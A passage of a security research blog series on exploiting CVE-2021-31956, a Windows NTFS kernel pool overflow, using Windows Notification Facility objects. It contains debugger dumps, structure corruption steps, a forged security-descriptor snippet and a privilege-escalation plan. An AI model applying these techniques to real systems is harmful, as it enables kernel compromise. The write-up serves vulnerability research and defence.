 ffff9a82c1cd4060 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4090 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4120 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4150 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4180 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4210 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4240 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4270 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4300 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4330 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4360 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4390 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4420 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4450 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4480 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4510 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4540 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4570 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4600 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4630 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4660 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4690 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4720 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4750 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4780 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4810 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4840 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4870 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4900 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4930 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4960 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4990 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49f0 size:   30 previous size:    0  (Free)       NtFE
*ffff9a82c1cd4a20 size:  220 previous size:    0  (Allocated) *Wnf  Process: ffff8608b72bf080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffff9a82c1cd4c30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080

However, the main thing here is the ability to find a more interesting object to corrupt. As a quick win, the PipeAttribute object from the great paper https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf was also used.

typedef struct pipe_attribute {
    LIST_ENTRY list;
    char* AttributeName;
    size_t ValueSize;
    char* AttributeValue;
    char data[0];
} pipe_attribute_t;

As PipeAttribute chunks are also a controllable size and allocated on the paged pool, it is possible to place one adjacent to either a vulnerable NTFS chunk or a WNF chunk which allows relative write’s.

Using this layout we can corrupt the PipeAttribute‘s Flink pointer and point this back to a fake pipe attribute as described in the paper above. Please refer back to that paper for more detailed information on the technique.

Diagramatically we end up with the following memory layout for the arbitrary read part:

Whilst this worked and provided a nice reliable arbitrary read primitive, the original aim was to explore WNF more to determine how an attacker may have leveraged it.

The journey to arbitrary write

After taking a step back after this minor Pipe Attribute detour and with the realisation that I could actually control the size of the vulnerable NTFS chunks. I started to investigate if it was possible to corrupt the StateData pointer of a _WNF_NAME_INSTANCE structure. Using this, so long as the DataSize and AllocatedSize could be aligned to sane values in the target area in which the overwrite was to occur in, then the bounds checking within the ExpWnfWriteStateData would be successful.

Looking at the creation of the _WNF_NAME_INSTANCE we can see that it will be of size 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. This ends up being put into a chunk of 0xC0 within the segment pool:

So the aim is to have the following occurring:

We can perform a spray as before using any size of _WNF_STATE_DATA which will lead to a _WNF_NAME_INSTANCE instance being allocated for each _WNF_STATE_DATA created.

Therefore can end up with our desired memory layout with a _WNF_NAME_INSTANCE adjacent to our overflowing NTFS chunk, as follows:

 ffffdd09b35c8010 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c80d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8190 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
*ffffdd09b35c8250 size:   c0 previous size:    0  (Allocated) *NtFE
        Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffffdd09b35c8310 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080       
 ffffdd09b35c83d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8490 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8550 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8610 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c86d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8790 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8850 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8910 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c89d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8a90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8b50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8c10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8cd0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8d90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8e50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8f10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080

We can see before the corruption the following structure values:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0xffffdd09`ad45d4a0 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffffdd09`b35b3e10 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

Then after our NTFS extended attributes overflow has occurred and we have overwritten a number of fields:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0x61616161`62626262 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffff8d87`686c8088 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

For example, the StateData pointer has been modified to hold the address of an EPROCESS structure:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 ((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)
((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)                 : 0xffff8d87686c8088 [Type: _WNF_STATE_DATA *]
    [+0x000] Header           [Type: _WNF_NODE_HEADER]
    [+0x004] AllocatedSize    : 0xffff8d87 [Type: unsigned long]
    [+0x008] DataSize         : 0x686c8088 [Type: unsigned long]
    [+0x00c] ChangeStamp      : 0xffff8d87 [Type: unsigned long]


PROCESS ffff8d87686c8080
    SessionId: 1  Cid: 1760    Peb: 100371000  ParentCid: 1210
    DirBase: 873d5000  ObjectTable: ffffdd09b2999380  HandleCount:  46.
    Image: TestEAOverflow.exe

I also made use of CVE-2021-31955 as a quick way to get hold of an EPROCESS address. At this was used within the in the wild exploit. However, with the primitives and flexibility of this overflow, it is expected that this would likely not be needed and this could also be exploited at low integrity.

There are still some challenges here though, and it is not as simple as just overwriting the StateName with a value which you would like to look up.

StateName Corruption

For a successful StateName lookup, the internal state name needs to match the external name queried from.

At this stage it is worth going into the StateName lookup process in more depth.

As mentioned within Playing with the Windows Notification Facility, each _WNF_NAME_INSTANCE is sorted and put into an AVL tree based on its StateName.

There is the external version of the StateName which is the internal version of the StateName XOR’d with 0x41C64E6DA3BC0074.

For example, the external StateName value 0x41c64e6da36d9945 would become the following internally:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 (*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))
(*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))                 [Type: _WNF_STATE_NAME_STRUCT]
    [+0x000 ( 3: 0)] Version          : 0x1 [Type: unsigned __int64]
    [+0x000 ( 5: 4)] NameLifetime     : 0x3 [Type: unsigned __int64]
    [+0x000 ( 9: 6)] DataScope        : 0x4 [Type: unsigned __int64]
    [+0x000 (10:10)] PermanentData    : 0x0 [Type: unsigned __int64]
    [+0x000 (63:11)] Sequence         : 0x1a33 [Type: unsigned __int64]
1: kd> dc 0xffffdd09b35c8348
ffffdd09`b35c8348  00d19931

Or in bitwise operations:

Version = InternalName & 0xf
LifeTime = (InternalName >> 4) & 0x3
DataScope = (InternalName >> 6) & 0xf
IsPermanent = (InternalName >> 0xa) & 0x1
Sequence = InternalName >> 0xb

The key thing to realise here is that whilst Version, LifeTime, DataScope and Sequence are controlled, the Sequence number for WnfTemporaryStateName state names is stored in a global.

As you can see from the below, based on the DataScope the current server Silo Globals or the Server Silo Globals are offset into to obtain v10 and then this used as the Sequence which is incremented by 1 each time.

Then in order to lookup a name instance the following code is taken:

i[3] in this case is actually the StateName of a _WNF_NAME_INSTANCE structure, as this is outside of the _RTL_BALANCED_NODE rooted off the NameSet member of a _WNF_SCOPE_INSTANCE structure.

Each of the _WNF_NAME_INSTANCE are joined together with the TreeLinks element. Therefore the tree traversal code above walks the AVL tree and uses it to find the correct StateName.

One challenge from a memory corruption perspective is that whilst you can determine the external and internal StateName‘s of the objects which have been heap sprayed, you don’t necessarily know which of the objects will be adjacent to the NTFS chunk which is being overflowed.

However, with careful crafting of the pool overflow, we can guess the appropriate value to set the _WNF_NAME_INSTANCE structure’s StateName to be.

It is also possible to construct your own AVL tree by corrupting the TreeLinks pointers, however, the main caveat with that is that care needs to be taken to avoid safe unlinking protection occurring.

As we can see from Windows Mitigations, Microsoft has implemented a significant number of mitigations to make heap and pool exploitation more difficult.

In a future blog post I will discuss in depth how this affects this specific exploit and what clean-up is necessary.

Security Descriptor

One other challenge I ran into whilst developing this exploit was due the security descriptor.

Initially I set this to be the address of a security descriptor within userland, which was used in NtCreateWnfStateName.

Performing some comparisons between an unmodified security descriptor within kernel space and the one in userspace demonstrated that these were different.

Kernel space:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)                 : 0xffff9e8253eca5a0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0x800c [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x28000200000014 [Type: void *]
    [+0x018] Sacl             : 0x14000000000001 [Type: _ACL *]
    [+0x020] Dacl             : 0x101001f0013 [Type: _ACL *]

After repointing the security descriptor to the userland structure:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)                 : 0x23ee3ab6ea0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0xc [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x0 [Type: void *]
    [+0x018] Sacl             : 0x0 [Type: _ACL *]
    [+0x020] Dacl             : 0x23ee3ab4350 [Type: _ACL *]

I then attempted to provide the fake the security descriptor with the same values. This didn’t work as expected and NtUpdateWnfStateData was still returning permission denied (-1073741790).

Ok then! Lets just make the DACL NULL, so that the everyone group has Full Control permissions.

After experimenting some more, patching up a fake security descriptor with the following values worked and the data was successfully written to my arbitrary location:

SECURITY_DESCRIPTOR* sd = (SECURITY_DESCRIPTOR*)malloc(sizeof(SECURITY_DESCRIPTOR));
sd->Revision = 0x1;
sd->Sbz1 = 0;
sd->Control = 0x800c;
sd->Owner = 0;
sd->Group = (PSID)0;
sd->Sacl = (PACL)0;
sd->Dacl = (PACL)0;

EPROCESS Corruption

Initially when testing out the arbitrary write, I was expecting that when I set the StateData pointer to be 0x6161616161616161 a kernel crash near the memcpy location. However, in practice the execution of ExpWnfWriteStateData was found to be performed in a worker thread. When an access violation occurs, this is caught and the NT status -1073741819 which is STATUS_ACCESS_VIOLATION is propagated back to userland. This made initial debugging more challenging, as the code around that function was a significantly hot path and with conditional breakpoints lead to a huge program standstill.

Anyhow, typically after achieving an arbitrary write an attacker will either leverage to perform a data-only based privilege escalation or to achieve arbitrary code execution.

As we are using CVE-2021-31955 for the EPROCESS address leak we continue our research down this path.

To recap, the following steps were needing to be taken:

1) The internal StateName matched up with the correct internal StateName so the correct external StateName can be found when required.
2) The Security Descriptor passing the checks in ExpWnfCheckCallerAccess.
3) The offsets of DataSize and AllocSize being appropriate for the area of memory desired.

So in summary we have the following memory layout after the overflow has occurred and the EPROCESS being treated as a _WNF_STATE_DATA:

We can then demonstrate corrupting the EPROCESS struct:

PROCESS ffff8881dc84e0c0
    SessionId: 1  Cid: 13fc    Peb: c2bb940000  ParentCid: 1184
    DirBase: 4444444444444444  ObjectTable: ffffc7843a65c500  HandleCount:  39.
    Image: TestEAOverflow.exe

PROCESS ffff8881dbfee0c0
    SessionId: 1  Cid: 073c    Peb: f143966000  ParentCid: 13fc
    DirBase: 135d92000  ObjectTable: ffffc7843a65ba40  HandleCount: 186.
    Image: conhost.exe

PROCESS ffff8881dc3560c0
    SessionId: 0  Cid: 0448    Peb: 825b82f000  ParentCid: 028c
    DirBase: 37daf000  ObjectTable: ffffc7843ec49100  HandleCount: 176.
    Image: WmiApSrv.exe

1: kd> dt _WNF_STATE_DATA ffffd68cef97a080+0x8
nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffffd68c
   +0x008 DataSize         : 0x100
   +0x00c ChangeStamp      : 2

1: kd> dc ffff8881dc84e0c0 L50
ffff8881`dc84e0c0  00000003 00000000 dc84e0c8 ffff8881  ................
ffff8881`dc84e0d0  00000100 41414142 44444444 44444444  ....BAAADDDDDDDD
ffff8881`dc84e0e0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e0f0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e100  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e110  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e120  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e130  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e140  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e150  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e160  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e170  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e180  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e190  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1a0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1b0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1c0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1d0  44444444 44444444 00000000 00000000  DDDDDDDD........
ffff8881`dc84e1e0  00000000 00000000 00000000 00000000  ................
ffff8881`dc84e1f0  00000000 00000000 00000000 00000000  ................

As you can see, EPROCESS+0x8 has been corrupted with attacker controlled data.

At this point typical approaches would be to either:

1) Target KTHREAD structures PreviousMode member

2) Target the EPROCESS token

These approaches and pros and cons have been discussed previously by EDG team members whilst exploiting a vulnerability in KTM.

The next stage will be discussed within a follow-up blog post as there are still some challenges to face before reliable privilege escalation is achieved.

Summary

In summary we have described more about the vulnerability and how it can be triggered. We have seen how WNF can be leveraged to enable a novel set of exploit primitive. That is all for now in part 1! In the next blog I will cover reliability improvements, kernel memory clean up and continuation.

✇NCC Group Research

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2

By: Alex Plaskett

Introduction

In part 1 the aim was to cover the following:

  • An overview of the vulnerability assigned CVE-2021-31956 (NTFS Paged Pool Memory corruption) and how to trigger

  • An introduction into the Windows Notification Framework (WNF) from an exploitation perspective

  • Exploit primitives which can be built using WNF

In this article I aim to build on that previous knowledge and cover the following areas:

  • Exploitation without the CVE-2021-31955 information disclosure

  • Enabling better exploit primitives through PreviousMode

  • Reliability, stability and exploit clean-up

  • Thoughts on detection

The version targeted within this blog was Windows 10 20H2 (OS Build 19042.508). However, this approach has been tested on all Windows versions post 19H1 when the segment pool was introduced.

Exploitation without CVE-2021-31955 information disclosure

I hinted in the previous blog post that this vulnerability could likely be exploited without the usage of the separate EPROCESS address leak vulnerability CVE-2021-31955). This was also realised too by Yan ZiShuang and documented within the blog post.

Typically, for Windows local privilege escalation, once an attacker has achieved arbitrary write or kernel code execution then the aim will be to escalate privileges for their associated userland process or pan a privileged command shell. Windows processes have an associated kernel structure called _EPROCESS which acts as the process object for that process. Within this structure, there is a Token member which represents the process’s security context and contains things such as the token privileges, token types, session id etc.

CVE-2021-31955 lead to an information disclosure of the address of the _EPROCESS for each running process on the system and was understood to be used by the in-the-wild attacks found by Kaspersky. However, in practice for exploitation of CVE-2021-31956 this separate vulnerability is not needed.

This is due to the _EPROCESS pointer being contained within the _WNF_NAME_INSTANCE as the CreatorProcess member:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Therefore, provided that it is possible to get a relative read/write primitive using a _WNF_STATE_DATA to be able to read and{write to a subsequent _WNF_NAME_INSTANCE, we can then overwrite the StateData pointer to point at an arbitrary location and also read the CreatorProcess address to obtain the address of the _EPROCESS structure within memory.

The initial pool layout we are aiming is as follows:

The difficulty with this is that due to the low fragmentation heap (LFH) randomisation, it makes reliably achieving this memory layout more difficult and iteration one of this exploit stayed away from the approach until more research was performed into improving the general reliability and reducing the chances of a BSOD.

As an example, under normal scenarios you might end up with the following allocation pattern for a number of sequentially allocated blocks:

In the absense of an LFH "Heap Randomisation" weakness or vulnerability, then this post explains how it is possible to achieve a "reasonably" high level of exploitation success and what necessary cleanups need to occur in order to maintain system stability post exploitation.

Stage 1: The Spray and Overflow

Starting from where we left off in the first article, we need to go back and rework the spray and overflow.

Firstly, our _WNF_NAME_INSTANCE is 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. As mentioned previously this gets put into a chunk of size 0xC0.

We also need to spray _WNF_STATE_DATA objects of size 0xA0 (which when added with the header 0x10 + the POOL_HEADER (0x10) we also end up with a chunk allocated of 0xC0.

As mentioned within part 1 of the article, since we can control the size of the vulnerable allocation we can also ensure that our overflowing NTFS extended attribute chunk is also allocated within the 0xC0 segment.

However, we cannot deterministically know which object will be adjacent to our vulnerable NTFS chunk (as mentioned above), we cannot take a similar approach of free’ing holes as in the past article and then reusing the resulting holes, as both the _WNF_STATE_DATA and _WNF_NAME_INSTANCE objects are allocated at the same time, and we need both present within the same pool segment.

Therefore, we need to be very careful with the overflow. We make sure that only the following fields are overflowed by 0x10 bytes (and the POOL_HEADER).

In the case of a corrupted _WNF_NAME_INSTANCE, both the Header and RunRef members will be overflowed:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF

In the case of a corrupted _WNF_STATE_DATA, the Header, AllocatedSize, DataSize and ChangeTimestamp members will be overflowed:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

As we don’t know if we are going to overflow a _WNF_NAME_INSTANCE or a _WNF_STATE_DATA first, then we can trigger the overflow and check for corruption by loop through querying each _WNF_STATE_DATA using NtQueryWnfStateData.

If we detect corruption, then we know we have identified our _WNF_STATE_DATA object. If not, then we can repeatedly trigger the spray and overflow until we have obtained a _WNF_STATE_DATA object which allows a read/write across the pool subsegment.

There are a few problems with this approach, some which can be addressed and some which there is not a perfect solution for:

  1. We only want to corrupt _WNF_STATE_DATA objects but the pool segment also contains _WNF_NAME_INSTANCE objects due to needing to be the same size. Using only a 0x10 data size overflow and cleaning up afterwards (as described in the Kernel Memory Cleanup section) means that this issue does not cause a problem.

  2. Occasionally our unbounded _WNF_STATA_DATA containing chunk can be allocated within the final block within the pool segment. This means that when querying with NtQueryWnfStateData an unmapped memory read will occur off the end of the page. This rarely happens in practice and increasing the spray size reduces the likelihood of this occurring (see Exploit Testing and Statistics section).

  3. Other operating system functionality may make an allocation within the 0xC0 pool segment and lead to corruption and instability. By performing a large spray size before triggering the overflow, from practical testing, this seems to rarely happen within the test environment.

I think it’s useful to document these challenges with modern memory corruption exploitation techniques where it’s not always possible to gain 100% reliability.

Overall with 1) remediated and 2+3 only occurring very rarely, in lieu of a perfect solution we can move to the next stage.

Stage 2: Locating a _WNF_NAME_INSTANCE and overwriting the StateData pointer

Once we have unbounded our _WNF_STATE_DATA by overflowing the DataSize and AllocatedSize as described above, and within the first blog post, then we can then use the relative read to locate an adjacent _WNF_NAME_INSTANCE.

By scanning through the memory we can locate the pattern "\x03\x09\xa8" which denotes the start of a _WNF_NAME_INSTANCE and from this obtain the interesting member variables.

The CreatorProcess, StateName, StateData, ScopeInstance can be disclosed from the identified target object.

We can then use the relative write to replace the StateData pointer with an arbitrary location which is desired for our read and write primitive. For example, an offset within the _EPROCESS structure based on the address which has been obtained from CreatorProcess.

Care needs to be taken here to ensure that the new location StateData points at overlaps with sane values for the AllocatedSize, DataSize values preceding the data wishing to be read or written.

In this case the aim was to achieve a full arbitrary read and write but without having the constraints of needing to find sane and reliable AllocatedSize and DataSize values prior to the memory which it was desired to write too.

Our overall goal was to target the KTHREAD structure’s PreviousMode member and then make use of make use of the APIs NtReadVirtualMemory and NtWriteVirtualMemory to enable a more flexible arbitrary read and write.

